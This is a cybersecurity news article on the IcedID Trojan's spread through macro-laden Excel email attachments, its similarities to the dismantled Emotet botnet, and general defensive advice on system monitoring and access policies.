IcedID Trojan – a replacement to Emotet?

The IcedID Malware

A malware named IcedID was discovered to spread through Excel attachments and Excel 4 macros that are sent to the users via malicious emails. The new threat seems to bear similarities and operate in a similar way to the Emotet Trojan, which was recently taken down.


Like Emotet, IcedID (also known as BokBot) is a type of modular malware that was initially used as a banking Trojan that would steal financial data from its victims and use it for banking frauds. However, over time the hackers started using this Trojan as a dropper that delivered other malicious programs into the system of its victims.

Experts note that the frequency of IcedID attacks has significantly increased over the last couple of months with the rise of different spam email campaigns that deliver the infected Excel spreadsheet attachments and malicious macros.

According to Uptycs researchers Abhijit Mohanta and Ashwin Vamshi, the first three months of 2021 saw over 15,000 HTTP requests that came from approximately 4,000 infected files. Most of those files were Excel spreadsheets with the .XLS or the .XLSM extensions.

Once the targeted user opens such a file, they’d be asked to click on an “enable content” button to supposedly access the contents of the file. However, if they click on that button, this would execute the malicious Excel 4 macros.

According to a security analysis by Uptycs, the fact that .XLSM supports Excel 4 macros is what allows the hackers to embed arbitrary commands through which they could download malware onto the victim’s machine from different URLs. Typically, those URLs are from legitimate sites that have been compromised by the hackers with the goal to spread malware.

Further investigation suggests that the different IcedID attacks must have been coordinated due to certain similarities between the different hacking campaigns. For example, all documents used to deliver IcedID had generic names related to business, such as “complaint and compensation claim”, “claim”, “overdue”, and more. Another similarity is that all the HTTP requests delivered disguised executable files (.EXE or .DLL) with fake extensions, such as .JPG, .DAT, or .GIF, intended to mislead the victim.

Furthermore, all of the macros used the same three techniques to remain undetected: the first one is to use a white-coloured font to make the text invisible on the white background, the second one is to hide the macros on three separate sheets, and the third one is to shrink the contents of a cell, thus hiding its original contents.

IcedID and Emotet

Until getting taken down in January, Emotet was often labelled as one of the most dangerous malware threats worldwide. On average, anywhere between 100,000 and 500,000 emails that distributed it were getting sent out each day while the threat was still active.

The Emotet Trojan was often being used as a dropper virus that stealthily delivered additional threats into an already infected machine. Among the threats that Emotet distributed were the Ryuk Ransomware, the Qakbot virus, and the TrickBot virus. It is also known that the hackers who operated it oftentimes lent the Trojan’s infrastructure as malware-as-a-service (MaaS) to other criminal actors.

At the start of this year, the global takedown “Operation LadyBird” took place – its primary goal was to disrupt the botnets that supported the Emotet Trojan and thus eliminate the majority of active instances of the virus. The operation was successful and over 1 million endpoints that supported Emotet got shut down.

Uptycs researchers believe, based on the rapid increase in the number of IcedID attacks, that this new Trojan is a candidate for Emotet’s place.

Like Emotet before it, IcedID has recently started to be used in dropper attacks where it served as the first-stage of an infection that delivered second-stage Ransomware cryptoviruses. There’s also information that IcedID’s infrastructure is getting used as a MaaS threat, as the hackers behind it are lending its infrastructure to other cybercriminals.

On the bright side, users and companies have access to a variety of different and effective options to protect themselves against such well-known threats.

According to New Net Technologies’ global vice president of security research, Dirk Schrader, there are certain characteristic traits shared by threats such as Emotet and IcedID that make protecting against them easier. For the attack to be successful, the Trojan dropper needs to make unauthorized changes in the system which could be thwarted if proper system monitoring is applied. This is why it is important for companies to have an adequate permissions and data access policy throughout their infrastructure so that not every user profile is allowed to make system changes, which could, in turn, help spot any external and malicious attempts to add anything harmful to the system.


About the author

Brandon Skies

Brandon is a researcher and content creator in the fields of cyber-security and virtual privacy. Years of experience enable him to provide readers with important information and adequate solutions for the latest software and malware problems.

Leave a Comment